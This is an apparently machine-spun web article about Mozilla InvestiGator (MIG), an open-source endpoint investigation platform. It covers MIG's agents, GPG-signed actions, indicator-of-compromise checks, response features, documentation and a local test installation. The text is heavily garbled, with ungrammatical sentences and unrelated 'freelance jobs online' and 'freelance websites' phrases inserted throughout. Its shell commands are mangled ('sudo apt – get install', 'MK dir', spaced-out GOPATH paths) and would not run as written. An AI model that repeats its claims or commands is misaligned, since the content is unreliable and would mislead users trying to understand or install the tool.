Mozilla Investigator (MIG) is a platform to be performed as an investigative surgery on the remote endpoints. It is enabled as an investigator to obtain information from a large number of systems in parallel. Thus it is accelerating an investigation of incident and operations security from day to day. MIG is composed of installed agent on all the systems of infrastructure that is queried in a real-time system to investigate their network state, memory, file system or configuration of endpoints. The agent is queried in a real-time system by using implementation of messaging protocol in an MIG scheduler. MIG has a database, API, console client and rabbit MQ relays.
MIG is allowed to an investigator to send some actions to pool of agent and check for compromising indicator as well as verify state configuration, create a firewall rule, update blacklist, block an account and so on. Agents are designed to secure, easy to deploy and lightweight. All the parameters are built in an agent at the compile time including investigator public key list. An agent binary is compiled for the target platform and it’s shipped without external dependency.
It runs on the targeted searchers on the millions of end points in a short time period. The architecture of Mozilla investigator is cross-platform and modular. Entirely, freelance jobs online gives MIG that is written in GO and an agent runs on the Linux, Windows, and MacOS. A capability is added through modules that are shipped and complied with their agents. It is used for GO that is simplified as an MIG architecture and assists to build security tool with minimal memory and CPU footprint.
Concepts of MIG:
- Easy to operate and deploy: MIG agent is designed to secure, lightweight and easy to deploy you can ask for your favorite system admins to be added it. It is a base of deployment without any fear of breaking an entire production system. All the parameters are built in an agent at the compile time including list and authorized ACL investigator. Security can enforce by using a PGP key. If the MIG server is compromised as your key is safe on the investigator laptop, the then there is no one break into an agent.
- Asynchronous and fast: MIG is a designer to an asynchronous and fast. It is used for AMQP to be distributed an action to the end points and relied on a channel to prevent a component from blocking. Commands and running actions are stored in the disk cache and do not rely on a running process for reliability. Speed is a very strong requirement. Most of the actions are taken few hundred of milliseconds to run. For example, when you are looking for hash in the largest directory and it must run only less than two minutes.
- Strong security primitives: Security and privacy are a statement. Agents are never sent raw data back to this platform but reply to instead of questions. All the signals are signed by the GPG keys that cannot be stored on this platform. Thus it is preventing compromise from taking freelance websites around the entire infrastructure.
Goals of MIG:
- Query pool of endpoints to verify the presence of specific indicator (it is similar to the IOC, but used the different format).
- It provides in a response of mechanism to lock down from the compromised endpoints.
- It is periodically verified end points compliance with their security requirements.
Features of MIG:
- MIG provides very strong authentication of an investigator. An action must have valid GPG signature. Each investigator has a various key for tracking.
- It provides in such a way of inspecting the remote system for IOC ( the indicator of compromise). At this moment, there is limited to file by name, content file by regex, connected to IP and file hashes (md5, sha1, sha256, sha384, sha3-224, sha3-512, sha3-256, sha512 and sha3-384).
- It is protected data security and investigates without any intruding. Raw data cannot be readily available to the investigator.
- Agent modules are working in a low-level device (file system blocks, memory, and network cards), network sniffer, firewall rule (read and write), accounts creation and destruction.
- MIG provide response mechanism including system password changes, dynamic firewall rules removal and addition and also process execution and destruction (execve and kill).
- Input & Output IOC and yara through an API.
- The output result is in a standard format for an alert.
- Investigation console.
All documentations are available in a doc directory on the http://mig.mozilla.org. There are two types of documentation: concepts & internal components and installation & configuration.
- Internal component and its concept: An essential documentation understands MIG architecture and its role in various parts.
- Configuration guide: Step by step guides to be deployed as an MIG platform from an agent to the database. Here are given some following instructions including:
- Client: A client is an interface that is used to an investigator on a local machine to be interacting with their MIG. It includes MIG command line, MIG console and MIG runner.
- Modules documentation: The module documentations are file, memory, package, net stat, scribe, ping and time drift.
- Workers documentation: In this documentation is used for agent Intel that is published an entire detail from end points to Miz def.
- Developer’s documentation: The freelance jobs online give developer documentation that works as a process of agent architecture, writing modules, writing persistent modules and API endpoints.
- Database documentation: MIG is stored data in a PostgreSQL. This page is explained as a database structure and some example queries.
Testing process of MIG:
Assume that you have dedicated ubuntu system like a VM. You can use a standalone installation script to be deployed as rapidly test environment.
$ sudo apt – get install golang git
# must be > = 1.5
$ go version
go version go1.6.1 Linux / and 64
$ export GOPATH = $ HOME / go
$ MK dir $ GOPATH
$ go get mig.ninja / mig
$ cd $GOPATH /src /mig.ninja /mig
$ bash tools / standalone_install.sh
Above mentioned scripts are installed all components that the MIG needs for any local host only installation process. The freelance websites are given instructions should be followed at the end of the script to be converted into real infrastructure or read installation and configuration.